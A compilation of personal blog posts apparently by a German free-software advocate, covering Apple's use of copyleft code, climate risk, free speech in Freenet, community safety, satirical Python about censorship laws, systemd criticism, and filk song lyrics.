Webkit is an especially good example of this: Apple took the khtml code from KDE, worked with it for half a year and only released binaries (which is a breach of the license of khtml) until they finally released their code in one big code-drop which the khtml folks had no chance of integrating cleanly.

That way Apple broke away from the community and created their own fork in a way which made sure that the KDE folks could not profit from Apples work without throwing out their own structure.

They still had to adhere the license, though, which enabled others to use Webkit - and essentially created a revolution in Webbrowser-development, because Apple added all the polish needed for a modern browser. If you look at the way they treated the khtml developers, though, do you really think they would have released any code on that critical part of their OS, if they had not been forced to do so by the strong copyleft used by KDE?

Cups

CUPS, the other example of Apple-maintained free software, … is GPL licensed, too. No surprise there: Why else should Apple give their work to others, if not because the license forces them to?

And even there they try to get out by adding a GPL-exception to the parts they write, which allows using those parts without giving out source code. But “This exception is only available for Apple OS-Developed Software and does not apply to software that is distributed for use on other operating systems”.

What do you think how much they will still maintain, as soon as they managed to get that header into all files - and don’t fear a free fork anymore? (also note, that shortly after Apple started maintaining cups, it broke on my GNU/Linux system - „Ein Schelm, wer böses dabei denkt“, as we say in Germany)

Darwin

Just look at what they did with Darwin. They took all the code from FreeBSD. Then they kept the uninteresting part free as long as needed to have a good name and get people work in their spare time on porting it to intel architectures, a work which greatly benefitted Apple, because they could then get away from PPC to no longer depend on IBM. The interesting part however, the graphical interface, was completely locked up from the beginning.

See why OpenDarwin stopped: “Availability of sources, interaction with Apple representatives, difficulty building and tracking sources, and a lack of interest from the community“ — OpenDarwin Shutting Down

4 of 5 reasons for stopping the free alternative directly come from Apple…

LLVM

Since LLVM was brought up in a comment, here’s the relevant part of my answer: For LLVM they have a clear goal to reach: Getting rid of a dependency on GCC for which they will have to release their adaptions indefinitely, while they can close down their new code for LLVM at any point.

I as potential user of their code cannot be sure that their future work on it will stay free (which is why I do not use their code - and different from Xorg, Apple has a track record of closing down their devices).

Epilogue

Should I complain about that? Actually no. After all, they are allowed to do it by the license. They just do what they can to maximize their monetary gain.

And actually I prefer seeing a big company use copyleft programs to improve its products, because that means that others will be able to achieve at least that part with free software.

If I should complain about anybody, then about all the people who praise Apple for doing what they are forced to do to get the work of others for free - and about shortsighted developers, who use non-copyleft licenses, which allow folks like Apple to save lots of money while locking out others and creating “the computer as a jail made cool”, as Richard M. Stallman put it quite nicely — I call that shackle-feats.

Since my interpretation was called worst-case in a comment, here’s the relevant part of my answer: I don’t really see anything, where Apple contributed something to be good. They did what they needed to avoid being sued, to avoid getting a GPLv3 fork which they would not be able to lock down, to get work for free without having to commit to anything and to get rid of GCC which they cannot lock down.

What irks me, though, is that there are quite a few people who call Apple good because of that. No, Apple is not good. Apple is a company and you should never trust a company. The only way to make Apple act ethically (“good”) would be to get their customers to base their buying decision on ethics. You can see this article as part of that effort: Dismantling illusionary ethics to make it easier for people to spot real ethical behavior.

Two visions of our future

storm shelter or forestry: Caption at the top: Save Civilization: Stop GHG emissioons, then roll a die. Then two panels: - result: 1, 2, 3: An image of a flooded storm shelter with caption we’re late. Build storm shelter and flood walls. - result: 4, 5, 6: An image of a forest with caption There is still time. Plant lots of trees.
    by Mike Perry (http://nodicemike.com)

We still have to stop CO₂ emissions and plant trees to prevent even worse catastrophes, but since 2022 the most likely future is that there will be catastrophes even if we stop CO₂ emissions right now. This is what climate scientists in the past 30 years hoped to prevent. We failed. Now we must fight to avoid even worse outcomes. We are making progress at that, but we must speed up.

Update 2022: As by the WMO, we’re now at 50% within the next 5 years: “⚀ or ⚁ or ⚂” (1 or 2 or 3). “The odds of at least one of the next 5 years temporarily reaching the Paris Agreement threshold of 1.5°C have increased to 50:50. In 2015 the chance was zero.”

Update (2021-09): According to IPCC AR6, we’re now at 50%.

Update 2018-09-03: As by Aengenheyster et al. 2018, we’re now at “⚀ or ⚁” (1 or 2): »However, reaching the 1.5 K target appears unlikely as MM would be required to start in 2018 for a probability of 67%.« MM means getting a 2% increase of the share of renewables every year.

I don’t know what we rolled, but I sure hope it’s not a 1.1

For the robust science behind the green future, see Hansen et al. 2017:

Young people's burden: requirement of negative CO₂ emissions.

If we stop emissions almost completely until 20252 and get lucky (so we only get the moderate part of the likely global warming due to the greenhouse effect), then we can prevent most longterm problems by innovative agriculture and forestry.

This is a time for all of humanity to band together and protect our home world. Even if you would not be willing to bet on not having rolled a 1, please help to cut emissions now. Use a bicycle if you can. Use public transport. If you need a car, buy by CO₂ emissions. Buy power generated from renewable sources. Eat less meat (at most 300g per week). Vote for those who fight to mitigate global warming and keep climate change manageable.

For the robust science behind the bleak future, see Hansen et al. 2016:1

Ice melt, sea level rise and superstorms.

If we don’t get much more active, I’ll soon have to update the bleak future to “⚀ or ⚁” (1 or 2).34

It’s crazy to just imagine the risk taken in the Paris agreement 2015 by targeting up to 1.5°C warming, and that was already the best plausible outcome.

Strip drawn on commission by the awesome Mike Perry (http://nodicemike.com/). Licensed cc by. The full source is attached.

There is a german version: Zusammen für Zivilisation.


  1. Not every place will become this uninhabitable. But almost every place will have huge adaptation cost. See Hansen et al. 2016. Let’s hope we rolled a 2-6; and let’s stop ruining our odds. We need to go green. 

  2. This says 2025 to have a number here. The actual paper says “If rapid phaseout of fossil fuel emissions begins soon, most extraction can be via improved agricultural and forestry practices”. The IPCC discusses faster phaseout to have some possible emission left in 2025 for those parts of economy which cannot be changed to renewable sources fast enough. 

  3. The probabilities are from the fifth IPCC report: “Climate Change 2014: Mitigation of Climate Change”, Chapter 6, Figure 6.14: Probability for staying below 2°C [warming]. 

  4. We would not be the first civilization to fall. The Maya might have gone down due to self-inflicted droughts and famine (more about that by BBC). 

AnhangGröße
Mike_Perry-comic-roll-a-die-2014-climate.psd11.5 MB
Mike_Perry-comic-roll-a-die-2014-climate-new-text-cropped-1-and-2-and-3.xcf10.52 MB
Mike_Perry-comic-roll-a-die-2014-climate-new-text-cropped-1-and-2-and-3.png2.27 MB
Mike_Perry-comic-roll-a-die-2014-climate-new-text-cropped-1-and-2-and-3-500x725.jpg133.17 KB

Why free speech does not equal to the right of being heard

→ written in a discussion with Sascha1 in Freenet using Sone.

If free speech included being allowed to force all people to listen, then it would also include my right to force you to listen to everything I say.

Think this on the scale of 6 billion people all using freenet. Every one of them could force you to listen to him/her/it. Whom would you ignore?

In WoT getting some people2 to see your message is possible, but it has a price: solving captchas.

The same is true for real life demonstrations: If you want to be seen, you have to get up and actually invest something - be it time, effort or risk to your reputation.

In real life we have channels through which we sell our attention. They are called advertisements and advertisement financed services, and access to our attention is tightly controlled by some few gatekeepers who make lots of money by keeping a hold on our attention.

In freenet all you have to do for being seen is solve some captchas, a rule which is the same for everyone.


  1. this is only true for those people who decide to publish captchas. If they disable that feature, you can only get their attention by first getting trusted by people whom they trust. 

You cannot afford 1% predators

The discussion about sexual assault at conferences has been going on for a few years now. Moral reasoning has been discussed a lot, and I will not repeat that.1

Here I will give a dispassionate, cold and calculating reason why your community cannot afford to tolerate 1% predators:

If in a community of 50 men and 50 women, one person is a predator who attacks one woman every year and causes her to leave, and every year either a man or a woman joins, the community will be male-only after 100 years.

Even 1% predators is far too much.

To take this apart:

  • I assume that interest in the topic is equal between men and women.
  • I assume that the community starts out with 50 men and 50 women.
  • Now I add a single predator who attacks one woman every year.
  • The woman subsequently leaves.
  • One new person joins to take her place. Since interest is assumed equal, there’s a 50% chance that it’s a woman and a 50% chance that it’s a man.
  • Overall the community therefore loses one woman every second year.
  • Within 100 years there will be no single woman left in the community.

Therefore no community can afford to tolerate even one predator per 100 people — regardless of how the predator causes women to leave.

Even 1% predators cause massive structural discrimination. If you tolerate those 1% of people, you lose 50% of your community — and, all moral issues aside, no community should burn half their members for the sake of the 1% who might be predators.

Note that most people in such a community won’t notice the predatory behavior, simply because most of the time they will only interact in smaller subgroups of 5 to 10 people. If in a community of 100 people more than 10 people noticed something odd, that’s a big red flag that there might be a predator in the group who could hurt and drive away half the community if not stopped.

PS: The same goes with the genders reversed: Anyone who makes one person of one specific gender leave every year can effectively render a community single-gender.


  1. Just read the following twitter thread if you need a refresher on the moral issues: So I was at an academic conference this weekend and had to physically intervene to prevent a sexual assault by a male colleague on a female colleague who was drunk to the point that she was clearly not in control of herself, and unable to exercise judgment or consent.Brad Simpson (@bradleyrsimpson) (June 22, 2018) 

def censor_the_net()

def censor_the_net():
  "wealth vs. democracy via media-control"
  try: SOPA() # see Stop Online Piracy Act 
  except Protest: # see sopastrike.com 
    try: PIPA() # see PROTECT IP Act 
    except Protest: # see weak links 
      try: OPEN() # see red herring 
      except Protest: 
        try: ACTA() # see Anti-Counterfeiting_Trade_Agreement 
        except Protest: # see resignation⁽¹⁾, court, vote anyway and advise against
          try: CISPA() # see Stop the Online Spying Bill 
          except Protest: # see Dangers
            try: CETA() # See Comprehensive Economic and Trade Agreement
            except Protest:  # see ePetition 50705
              try: TTIP() # See Transatlantic Trade and Investment Partnership
              except Protest: # see TTIP-Protest erreicht Brüssel and Wie wir TTIP gestoppt haben
                try: TISA() # See Secret Trade in Services Agreement (TISA)
                except Protest: # see Unter Ausschluss der Öffentlichkeit
                  try: JEFTA() # See Wie TTIP und wieder hinter verschlossenen Türen
                  except Protest: # see deep concern und TTIP auf Japanisch verhindern und Ein Kniefall vor Japan? und JEFTA Leaks
                    try: Article11And13() # See Die Zensurmaschinen und das Leistungsschutzrecht kommen in die Zielgerade der EU-Gesetzgebung 
                    except Protest: # see Stop the censorship-machinery! Save the Internet!
                      try: FreiwilligeRasterung() # See Mit Hashabgleich und TPM 
                      except Protest: # see nur für gute Menschen and „eine neue Zensursula-Kampagne“ and „Wenn Privatsphäre kriminalisiert wird, werden nur Kriminelle noch Privatsphäre haben.“
                        try: TERREG() # See TERREG-Verordnung
                        except Protest: # see discord.savetheinternet and TERREG-Sharepics and Uploadfilter auf Steroiden and new online censorship powers
                          try: Chatkontrolle() # See Nachrichtendurchleuchtung
                          except Protest: # see KI Anzeige wegen Sexting and Wiretapping Children and Deutscher Anwaltsverein and Strategic autonomy in danger and Kinderschutzbund gegen anlasslose Scans verschlüsselter Nachrichten and droht unsere Strafverfolgung…lahmzulegen and das verdächtige Bild
                            try: CETA_in_Gruen() # See Ratifizierung im Galopp
                            except Protest: # see Ceta bleibt falsch and Zu wenig staatliche Kontrolle
                              if destroy_free_speech_and_computers(): # (english video)
                                from __future__ import plutocracy 
while wealth_breeds_wealth and wealth_gives_power: # (german text and english video) # see wealth vs. democracy via media-control (german) censor_the_net()

This code is valid Python.

Feel free to use and change this snippet, as long as you include a reference to this page (http://draketo.de/node/475 or http://draketo.de/light/english/politics/def-censor-the-net-2012) or my name (Arne Babenhauserheide).


Here’s the linked english video, embedded (external, not GPL!):

default answer to “I want to connect with you on [hip unfree service]”

I just decided to give a default answer when I get some email from people asking me to connect to them on some new unfree service:

Hello [Person],

You asked me to connect with you on some unfree service. If you still want that, just use a status.net-server. Those are federated, so you can use a number of different providers and still be connected to everyone on any other server. As an example, see quitter.se — or check the server-feature list1.

You can then subscribe to me on sn.1w6.org/drak.

It’s bad enough that I have Twitter and G+. I don’t see value in another non-federated service.

Best wishes,
Arne

PS: Join the Federation!


  1. http://federation.skilledtests.com/select_your_server.html "Public Status.net server comparison" 

don’t change your habits - fix your tools!

→ In don't run 'strings' on untrusted files Michal Zalewski complained that running the strings-utility for computer forensics or other fields of information security could make you vulnerable yourself, so you should not use that. Given that strings is Free Software, I find a different conclusion from the vulnerability of tools used by professional forensics people.

I’d say if you’re actually using these tools to earn money, it is high time to go in and fix them. Also the linked bug (nine years ago) is marked as fixed. So there are people doing that.

Software has bugs. Free Software makes it possible for people who rely on it to fix problems they encounter - especially when they rely on it for their profession.

That’s part of the point of allowing commercial use of Free Software: To allow expert craftspeople to collaborate on improving their tools.

PS: Naturally there’s a limit to fixing the tools. There are habits which should be changed, but if the tools don’t get worse for other things by fixing them, those changed habits are workarounds which should be replaced with clean fixes.

identi.ca Group: Out of Group (!oog)

What !oog is

The Out of Group group is a way to request leading an overboarding discussion out of group (so you don't spam all the people who are in the group where the discussion started, but who simply want news).

Motto

Please discuss out of group. You can wrap up the discussion afterwards (link to the context) and add a group tag then.

How To

To request taking a discussion out of group, simply join !oog, add !oog to your message and then leave the group again (except if you want to see other !oog requests).

For example you can use the following to request moving !oog:

Please let us continue the discussion !oog and wrap it up afterwards. It disturbs others in here. !group1 !group2

Background

This is a reaction to a discussion about the use of group-tags in discussions.

Archived discussion

Available under the Creative Commons Attribution 3.0 license.

  • rysiek
    @teddks: stop using group tags, please. everybody on !ubuntu and !linux have heard enough, really.

  • teddks
    @rysiek I respond to in-group messages in-group. If you don't want me to use them, don't use them to me. !ubuntu !linux

  • arnebab
    @rysiek @teddks please leave the group tags out, both of you.

  • teddks
    @arnebab My policy for group-posting rebuttals was posted a bit ago.

  • arnebab
    @teddks please discuss out of the group. You can wrap up the discussion afterwards and add a group tag then. You're one post from a block.

  • arnebab
    @teddks By not discussing in the group you make the others' in-group posts look silly. Otherwise you just look silly yourself.

  • teddks
    @arnebab Wait, what? I only discuss in-group if the previous post was in-group.

  • arnebab
    @teddks That principle doesn't scale. If we all used it groups would be useless. A wrapup post can get people to read all http://is.gd/6CoYI

  • teddks
    @arnebab I might start doing that for oog discussions, but I'm not going to deny myself the same forum my opponents have.

  • arnebab
    @teddks they are not opponents but discussion partners. And they look silly if they stay ingroup while you post oog. Just ask them to go oog

  • arnebab
    @teddks and wrap it up later. If they insist on staying ingroup, just post one ingroup request to come oog and let peer pressure do the rest

  • arnebab
    @teddks they broadcast to people who aren't interested and will block them.

  • arnebab
    @teddks sorry for the phraselike answer. 140 chars aren't ideal for discussing more complex topics...

  • teddks
    @arnebab I understand. I kind of regret how identi.ca has taken the place of IRC for a lot of things.

  • teddks
    @arnebab That's irrelevant; in-group they get to broadcast their arguments and their views. I'm not going to deny myself that.

  • arnebab
    @teddks That means I have to block you when you post your next ingroup broadcast. You lose all readers that way.

  • teddks
    @arnebab Now you are inviting spam and personal attacks against me in !ubuntu. Is that pursuant to the Code of Conduct?

  • arnebab
    @teddks You do know that people can see the context with one click, do you?

  • teddks
    @arnebab I don't see what you're implying - that I should depend on clickthroughs to have my arguments be heard?

  • arnebab
    @teddks Since you kept spamming the !ubuntu and !linux group and explicitely said you won't stop ( http://is.gd/6Cucx ) I blocked you.

  • teddks
    @arnebab I can't respond fully now, but I will later. I'm sorry that the #Ubuntu group's de facto policy is now one of censorship.

Note: arnebab was no member of the ubuntu group at that time. The block was/is a purely personal one: Nothing teddks writes will appear on arnebabs timeline, till he unblocks teddks.

p2p-networks help law enforcement catch hard criminals

Comment to: Local man faces court on child pornography charges by heraldstandard.com

As I see it, the only way the authorities did track him was due to his use of p2p-networks.

At the moment, technology makes it relatively easy for the police to track hard criminals in p2p-networks, but it also allows people to do small infringements rather safely (just like people don't stop at red traffic lights when there is no car in sight),

So I'd think the current state quite ideal.

Sadly there's an organisation called RIAA1 which drives p2p-networks underground and which will eventually cease that action or achieve the "fame" to have been the one organisation which was responsible in the end for forcing p2p-networks to evolve into completely anonymous and untrackable networks, where hard crimes aren't trackable anymore.

So, this case shows once again, that noncommercial "piracy" shouldn't be attacked but should instead be allowed and even fostered, because it increases social welfare (the access to media is improved, while there is no significant damage to sales) and in many cases even helped law enforcement catch criminals who really do damage (and in this case: did very much damage).

Information about the impact of p2p-networks based on a study from the university of chicago: - http://www.journals.uchicago.edu/JPE/journal/issues/v115n1/31618/31618.html - http://www.journals.uchicago.edu/cgi-bin/resolve?JPE31618PDF (open twice to read)


  1. The RIAA is nowadays accompanied by the MPAA. 

power and blindness: the tragedy behind systemd

→ comment to The Tragedy of systemd where Benno Rice said that he’s impressed by the way how systemd was spread into most GNU/Linux distributions and that systemd was a source of ideas for BSD.

Looking at the methods used to force distributions to adopt systemd, i.e. by adding hard dependencies in the biggest desktop environment or by bundling udev and continuously tightening the dependency from udev on systemd, that’s a form of power-play against the distributions. A dependency I really don’t want. One group decided that they wanted to force everyone else to buy into their new system. And then they used every leverage they could get to do that.

SystemD developers decided to become the one group that can dictate conditions on everyone else.

I can see the skill in that power-play, and be impressed by the skill, but seeing how that power is used and what methods are used, I am also horrified by what they did and how they will continue to abuse that power they now grabbed.

About systemd being a source of ideas: systemd contains quite a few ideas that come straight from the Hurd, but have worse implementations in systemd. Systemd solves problems by tacking things onto Linux — problems that have been solved in the Hurd in a clean way 15 years ago. For good ideas, don’t repeat the mistake of ignoring the Hurd. Instead first look at the clean implementation and take care to put functionality at the right level.

In hindsight, SystemD is the consequence of ignoring that the Hurd solves real problems. Of ignoring the technical advantages of the Hurd.

power and deception

A religious leader is nothing more than a media-star who managed to convince people that the tale, in which he or she is special, is actually true.

Just like aristocrats managed to convince people that what their ancestors did gives them the right to control the lives of other people.

And like the rich convince people that money gives them the right to control a larger part of the world than others.

“If you like what I do, why don’t you help me?”

Almost every free software developer made the experience that many people like his or her work, but very few actually provide help. If you experience this, don’t let it disheart you. Verbal support without practical help sounds inconsistent at first, but it actually is the result of limited time.

Most people who have the skills to help are already committed to other projects, so they cannot help you on yours. They can encourage you from the sidelines (“This is cool! If I had time, I’d gladly help!”), but they cannot dive into the code, understand it and help improving it.

If you have 100 fans, one might actually have the resources to provide help. And this is not limited to software.

See for example how this works in media: A video from acapella artist Smooth McGroove gets 250.000 views on Youtube and 15.000 Likes. It is funded by 750 people (with at least 1$ per video - about 200 give at least 5$). These are the numbers for someone who has 45.000 followers in twitter and 160.000 Likes in F***b***. And who’s a legend in the gaming community - while being funded by only 750 people (including me).

250k viewers, 750 supporters. 3 in 1000 people support him (it’s enough for him to work full-time on his art). That’s the scale I want to show here. And this scale is visible when it’s just about giving One Dollar - the equivalent of 5 minutes of work. Much less than the time it took me to compose this text.

So whatever project you do: If few people help you, keep up your spirits: You are competing against every other project out there for their time and money - and some of these projects might be their own creations.

And when even a single person supports you, remember that this is a huge statement of support - much bigger than it seems when you are focussed on the work you do.

(This is the best time to again thank everyone who ever supported me: Thank you for your help! I don’t earn enough to fund the cost of my server, but everything I get is like a little star which lights up in my heart and shows me that there are people who care enough to give me something for the stuff I do.)

(Written in a bug-report for el marmalade)

Songs

Below you find some of my songs.

To see only songs which have a recording I deem "listenable", please check the

 

< < Songs in the Wind of Time > >

 

- they also feature a PodCast.

Happy listening!

Besides: If you speak german (or just happen to like it), you might enjoy some of my german songs.

(All this is) Gentoo for me

Gentoo for me Logo- Words and Music: Arne Babenhauserheide ( http://draketo.de )


Listen to the song: ogg
This recording is part of the music podcast singing in the winds of time.

Refrain:
  I build my kernel and I strip it down,
  my programs only do what I need
  the tree is at my very core
  it's my whole world and it is my seed.

I came to Gentoo several years ago,
it's power was my joy and woe,
replaced OSX with a mighty shell,
and learned its ways and learned them well.

(well mostly, and learning at times is a hell)

--

I rebuilt only 2 times since that day,
for at first I didn't know my way,
the second one was a lovely bird,
but a new Computer brought the third.

(someday I want a Gentoo GNU/Hurd)

--

I learned each day and my knowledge grew,
from the wiki and forums it leaped and flew,
information in structure gave power in mind,
and the strongest is what the tutorials bind.

(but read them well, or trouble's what you find)

--

A new life came when I met the snake,
I'd been asleep, now I'm awake,
for portage might be quite complex,
but reading Python's sometimes close to sex.

(go deeper and deeper and the world seems to shift)

--

Somewhere between some seedlings appeared,
with stuff for special people geared,
sometimes dangerous, but mostly good,
and the tree had grown a little wood.

(but remember where the main trunk stood)

--

And now the tree has KDE 4,
since that appeared I like it evermore.
All that nifty stuff I missed from my Mac,
usability and beauty and the vision are back.

(and don't forget power, more than any I knew before)

--

Together all this is Gentoo for me,
but there sure is more I don't get or see,
and some parts for which I feel quite strong,
just didn't fit into this song.

(Gentoo's much too large to fit into any... )


PS: I just uploaded this into my Jamendo Account.

PS: I just found another (older) Gentoo song.

AnhangGröße
gentoo_for_me-v0.3.ogg4.21 MB
Gentoo-and-Python-60x70.png5.78 KB
Gentoo-and-Python.svg215.76 KB

A song from the icy lands

A song about sharing and free software and changing the world. Originally written to recreate the vision of the Polar Skulk in art.

Criticism and praise would be a great gift to the pup writing this song.

A song from the icy lands

Freedom for Music, for Movies and for every word,
Fighting is not quite absurd,
and we are peaceful, good and kind,
and fight for freedom of the mind.

--

Ref1:
Our world is ice,
but we're together,
calling to the moon,
the cousins of the wolf.

Our tales of freedom
light a fire
of love and family,
the song of foxes.

we teach the wolves,
and sing of beauty,
gather wisdom,
and sing the music of the world.

Our world is ice,
but we're together,
calling to the moon,
the cousins of the wolf.

Our tales of freedom
light a fire
of love and family,
the song of foxes.

we teach the wolves,
and sing of beauty,
gather wisdom,
and free the music of the world.

--

Our skulk is happy with that which is free,
we spread the free things which we see,
like Gnus, who made the firelight,
we spread the freedom in the night.

--

Ref2:
-Ref 1 but:

... learn the wisdom of the world

... free the wisdom of the world.

--

Each night we meet artists who give us their songs,
and more learn each day, where the music belongs,
and wherever we travel, a seed takes its hold,
and singing and dancing shine brighter than gold.

and wherever we travel, a seed takes its hold,
and singing and dancing grow stronger than gold.

--

Ref3:
-Ref 1 but:
... dance the rhythm of the world

... change the rhythm of the world.


If you liked the song from the icy lands, you might also like a tale of foxes and freedom and Infinite Hands.

Dragon Cycle

The War of Dragons and Birth of the Dragonriders Sung and played at FilkCONtinental 2004.

No music yet - but someday I'll get that recording...

Dragon Cycle 1: Dragons Lament

Ah_ah_ah...

What have those people done?
The Dragon lies there, in Her own blood.

Ah_ah_ah...

What have those people done?
The Dragon lies there, in Her own blood.

Ah_ah_ah...

They came in great hordes,
The Dragon lies there, in Her own blood.

Ah_ah_ah...

They came in great hordes,
The Dragon fought, but not well enough.

Ah_ah_ah...

She killed many hordes,
The Dragon fought, but not well enough.

Ah_ah_ah...

She killed many hordes,
But at last, She lost to the flood.

Ah_ah_ah ... ah___

Dragon Cycle 2: Step into their Land

I come to you for my child has cried,
      and my mate is dead.
I know, you're shivering now in dread,
      but don't you fear for your hide.
No dragon will burn your cities down,
      when you give what we demand.
The bodies of those, who took her life,
      shall Die from human hand.
      They shall die from Human Hand.
For dragon's Law and Custom, now,
      I'll fold my wings till sundown,
      To see what you decide.

Dragon Cycle 3: Capture

Puny Human, what have you Done?!
You call powers, which aren't yours to control,
which will sweep all away, when used in war.

The bonds on this, my body, will not hold forever,
and when they perish, so will You!

Back off in fear, that I might use what you did,
which neither Dragon nor Human should ever touch.

Why don't you leave wizard?

Show me that, which you clutch in your robes,
black as they are to block my view.

No! You know not, what you do!
I call on all you learned through your study of magic,
don't soil your soul any more
by forcing what is immortal
into your human shape!

Don't you dare!
You and your offspring
shall be hunted by all dragons
for now and forever!

A childs voice: "Where am I? Where am I?"

Act: *drop down and look up like an innocent unknowing child.*

Dragon Cycle 4: Flight and Slaughter

    e              C      D
The dragons in all glory ceased to fight,
        e          D          e
    as wizards power scorched their wings.

As human armies marched along, in greatest size,
    With wizards in their leading ranks.
The dragons left the battleground without a single strike
    left inhabited lands.

They fled to lonely forests, dark and lush,
    The humans burned them down.
They fled to plains and grasslads, never seen and never touched,
    the humans brought their crown.

They then fled to dark marches, where sunlight never shines,
    a thousand workers pumped them dry
And then at last they all drew back,
    to mountains near the sky.

|| Instrumental ||

e                 D     e
In darkness dances a little flame,
         C                     D
    from teeth it leaps, from breath it came

And sparkles bright on polished stone,
    on scales of one, who sleeps alone,
And dreams uneasy dreams at night,
    of hunger suffering thirst and blight,

And each time a being dies in vain,
    the dragons body shakes in pain,
For she, the oldest on this land,
    can feel the pain, the fury, the hate
    and despair of all who live.

|| fade out. then spoken ||

Into this darkness sounds a step,
of boots of metal, cold and rash,
the ringing of swords, when unsheated,
and many boots, and always more.
scaled eyelids flutter and rusty red eyes
shimmer as the light of the moons gets caught therein.

"Why do you invade my home?
You gain little by slaying me, but
the world loses a close friend with me."

Nothing answered but the singing of steel,
when it is flung through the air,
and the blood of a dragon wet the ground this day,
and the rage of the dragons got unleashed,
when the swords returned to their sheets.

Dragon Cycle 5: Death and waking

Fire sweeping over the land,
destruction and death,
the dragons are free.
-
Hate and fury in the village,
wings bring storm
and burning hail.
-
The fire burns the woman,
burns the man,
the dragon nears the child.
-
Eyes of fury meet the fear,
nostrils taste
the anguish of the child.
-
Fire builds deep in the guts,
leaps from teeth,
and stops down dead.
-
A cry meets dragons fury
"Leave my sister!"
The dragon stops.
-
From rags beneath the window board
a child rises
and stares the dragon down.
-
Fingers grow to dragon claws,
Teeth grow sharper, skin goes black,
fire burns the clothes. A dragon returns.
-
A voice of power, voice of War,
"We will not fight,
Not anymore!"

-
Bows then down to the childs big eyes,
Hot breath on her face,
quietly speaks:
"On my back you ride today,
we shall from now together stay,
and fly the winds as one."

Dragon Cycle 6: Bard's Fair

Dragon and human they fly on the winds,
their bodies floating ever higher.
Their bond of purity and of loving,
and something deep within their souls.

||: And they always remember the voice of war,
"We will not fight, not anymore!" :||

Drowsy Pagan (and his stew) - a Filk on Dawson's Christian

To the melody of Dawson's Christian from Duane Elms.



- PDF -

FilkTeX

Jason Drowsy was a hunter known to cook a burning stew,
and he turned to be a pagan in the hunt of eigthy two.
Now that pagan was the finest cook of the royal twins
and the stew of Jason Drowsy smelled like sins.

In the hunt for the kings wedding, waiting for the royal son,
he then saw a regal steed who was equal to no one,
as the royal son came by him, and he rode out for a prize,
Drowsy knew too well which monster he would slice.

No one talking saw the battle, though the guard was quick to leave,
when they reached the site they found a scene no sane man could believe.
Dead in grass there lay the princeguard, cut to ribbons all around,
but no sign of Jason Drowsy could be found.

Chorus 1:
There are stories of the nightwatch and the ents and dragonwood,
there are stories of the unicorn with a lady at his foot,
but the tale that warms my spirit more because I know it's true
is the tale of Jason Drowsy and his stew,
yes the tale of Drowsy pagan and his stew.

- break for music -

I was second scout for heras dream, the escort was all mine,
we were shipping precious metals and a carriage with wine,
It was in the second week of the most uneventful ride,
when the cold and snow froze all our breath at night.

Now to me there was no question, for there was nowhere to run,
and you just can't keep on moving when you never see the sun,
so we stopped and built a campsite for a time in freezing snow,
when in underbrush a light began to glow.

First we thought it a predator, but the color was all wrong,
then we thought it might be rescue, but no sound of horn did come,
when noone answered hailing we all felt an unknown dread,
then the fire grew and started burning red.

Now a glow came from that fire that is known by very few,
and we never knew a meal could smell just like that special stew,
never fearing our numbers then a figure left the wood,
and he carried a huge bowl which smelled too good.

Chorus 2:
And that pagans stew burned hotter than all stew I ate before,
and its taste would melt to easily the heart of any whore,
as the meal then filled our stomachs and we searched for some more shreds,
all the fear of cold was wiped from our heads,
all the fear of cold was wiped from our heads.

Just as quickly as we started all the feasting then was done,
for the cold inside had vanished and the strangers stew had won,
though we tried to call and thank him, not an answer could we draw,
then he dropped the bowl and this is what we saw.

It had markings there all over and an emblem on one side,
and we knew that every owner but that pagan had long died,
for the markings spoke of royalty, and deep inside we knew,
we all ate from Drowsy pagans fabled stew.

But instead of staying with us, he then simply walked away,
but came back each night with more stew tasting as if made by fey,
when at last the cold did lift, deep inside us each one knew,
we were saved by Jason Drowsy's burning stew, yes, we were saved by Drowsy pagans burning stew.

- Chorus 1 -


Background: I really love the sound of Dawson's Christian, but I never liked the name of the ship - and I learned from my parents not to glorify violence, at least not all the time. Violence is the ultimate escalation of a conflict, so it is well suited to stories, but there are much more important things in life than being the best soldier - for example being the legendary cook who saves caravans from freezing to death and who chose a life in the wilderness over the life for his king when he realized what's really important in our world.

AnhangGröße
drowsy-pagan.pdf48.44 KB
drowsy-pagan.flk3.3 KB
drowsy-pagan-thumbnail.png7.75 KB

Filk the gist

A parody on March of Cambreadth (mp3) by Heather Alexander aka Alexander James Adams, the Fairy Tale Minstrel, written on the filk-de list to say “damn, we are filkers! We don’t quabble about politics — we sing about them!”

Filk the gist

Keyboards klick, Cellphones ring,
Shining laptop’s hackers sing,
Newsfeeds burn with polished prose,
Show us where we find our foes,
Midnight flame with congressmen,
Fight the trolls to keep us sane,
Sound the horn and call the cry,
How many of us can spot their lie?

Fuck the orders you get told,
Make their shallow hearts get cold,
Fight until you die or drop,
A force like ours is hard to stop,
Close your mind to stress and pain,
Write till you’re no longer sane,
Let not one wrong word pass by,
How many of us can spot their lie?

Guard your disk and emails well,
Send these bastards back to hell,
We’ll teach them the cyberway,
They won’t write in our clay,
Use your shield and use your head,
Fight till every line glows red,
Raise the flag up to the sky,
How many of us can spot their lie?

Dawn has broke, the time has come,
Publish to a marching drum,
We’ll win the war and pay the toll,
We’ll fight as one in heart and soul,
Midnight flame in filkers list,
Write the songs and catch the gist,
Sound the horn and call the cry,
How many of us can spot their lie?

Hackers blog while Filkers sing,
Pegasus has spread its wing,
Yesterday we were too shy,
How many of us can spot their lie?

PS: and to make crystal clear what I mean, because it wasn’t on the mailing list: Politics in song are Filk, and this song is against lying politicians! I’m sorry, Le-matya. This was meant to support your position but I forgot to doublecheck if it is clear in the context.

Happy Birthday to GNU - 25 years

Today is the 25th birthday of the GNU project - the very beginning of the free software community we are today.

This is my small, humble contribution for the birthday celebration.

Happy Birthday to GNU (ogg vorbis)

Happy Birthday to GNU,
Happy Birthday to GNU,
Happy Birthday not Unix,
Happy Birthday to GNU.

Naturally this recording is free licensed.

It is part of the music podcast singing in the winds of time.

AnhangGröße
Happy_Birthday_to_GNU.ogg215.82 KB

In Circles / The memory of time

I feel the time pass in our circles,
each year another one changed,
a head has turned white,
a hand has gone wry,
growing older as time passes by.

In our circle the time is a slide-show,
each year adds a picture or two,
and our memories in vivid colors
show the changes within me and you.

Here we see life as it happens,
see how choices affect our self,
see who will come near
of friends we hold dear,
who blossoms and who confronts fear.

Some of you have brought your children
or were children when first you came,
the flow of time never stops running
with none of us staying the same.

So time is present in circles,
I’m feeling it turning the wheel,
and life gains in meaning,
with time always stealing
our hours while making them real.

Infinite Hands - singing a part of the history of free software (filk)

- Free Software version of "Finity's End"; original: {lyrics: CJ Cherryh, music: Leslie Fish}.
- filked by Draketo aka Arne Babenhauserheide (draketo.de) (capo 3)

 

- please check the dedicated site: http://infinite-hands.draketo.de -

 

